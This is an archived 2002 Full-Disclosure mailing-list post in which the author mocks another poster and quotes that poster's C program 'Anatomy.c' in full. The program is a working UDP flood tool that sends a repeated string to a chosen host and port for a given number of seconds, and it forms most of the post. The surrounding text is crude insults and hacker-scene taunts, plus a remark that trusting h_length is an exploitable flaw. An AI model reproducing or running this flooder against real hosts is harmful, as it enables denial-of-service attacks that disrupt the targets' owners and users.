|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
rfp_the_ripper_at_hushmail.com
Date: Tue Aug 27 2002 - 02:24:51 CDT
Ok jerkface, before you call ~el8 and phrack lame, why don't
you learn how to evolve beyond remedial sockets programming?
I won't be a pedant and point out the lack of error checking
and other minor points... but HEY BR0 WH4T'Z THIS:
> bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
Trusting h_length? [LOL] WTF R U TH1NK1NG BR0? [LOL] And how
come the security expert Isaak Bloodlore didn't comment on
this exploitable condition in the client?!
>/* From the big generousity of el8 and phrack 
efnet. */
> /* l4m3rz!! h4h4!!! */
h4h4h4h4h ell-oh-ell'ing u loolololooxzllioollzoolZ
>/*
>* Anatomy.c
>* I have no idea how this could be a threat
>* if it would be kept private.
>*
>* Published by: slackwh0re
><slackwh0refuck-el8-and-fuck-phrack_at_efnet.com>
>* Author: unknown <unknownunknown.unk>
>*
>* k1dd13 us4g3: ./anatomy
>* 3ls3: `vi anatomy.c`
>*
>* --slackwh0re
>*
>* Full-Disclosure, Fresh and shiny.
>* Full-Disclosure, Unreal hacking.
>* Full-Disclosure, Cos that's the real elite shit.
>* Full-Disclosure, Ken Levine does it.
>* Full-Disclosure, - since 1901.
>* Full-Disclosure, ~/Full-Disclosure directory.
>* Full-Disclosure, Erected because of it.
>* Full-Disclosure, Lame el8 blames
>* Full-Disclosure,l8er.
>*
>* He said: "Don't wonder why there is no comments."
>*/
>
>#define BOMB_STRING "0123456789ABCDE"
>#define BOMB_SIZE 15
>
>#include <stdio.h>
>#include <sys/param.h>
>#include <sys/socket.h>
>#include <sys/time.h>
>#include <time.h>
>#include <netinet/in.h>
>#include <netdb.h>
>#include <stdarg.h>
>
>int echo_connect(char *, short);
>
>int echo_connect(char *server, short port)
>{
> struct sockaddr_in sin;
> struct hostent *hp;
> int thesock;
>
> printf("\n");
> printf("Stealth> %s : port %d\n", server, port);
> hp = gethostbyname(server);
> if (hp==NULL) {
>printf("Stealth> Non-existant host: %s\n",server);
>printf("\n");
>exit(0);
> }
> bzero((char*) &sin, sizeof(sin));
> bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
> sin.sin_family = hp->h_addrtype;
> sin.sin_port = htons(port);
> thesock = socket(AF_INET, SOCK_DGRAM, 0);
> connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
> return thesock;
>}
>main(int argc, char **argv)
>{
> time_t start=time(NULL);
> int s;
> int secs;
> if(argc != 4)
> {
>
>printf("\n");
>printf("Anatomy Stealth By T10o Modified By The DvS. U dun Phee
>R?!\n");
>printf("\n");
>printf("Usage: st-kill <the lamer host> <fucking port> <secs>\n
>");
>printf("\n");
>exit(0);
> }
> s=echo_connect(argv[1], atoi(argv[2]));
> secs= atoi(argv[3]);
> for(;;)
> {
>while(time(NULL) <= start+secs)
>{send(s, BOMB_STRING, BOMB_SIZE, 0);}
>exit(0);
> }
>}
>
>/* From the big generousity of el8 and phrack efnet. */
> /* l4m3rz!! h4h4!!! */
>
>
>
>
>
>_______________________________________________________________
>__
>Chat with friends online, try MSN Messenger: http://messenger.m
>sn.com
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Get your free encrypted email at https://www.hushmail.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]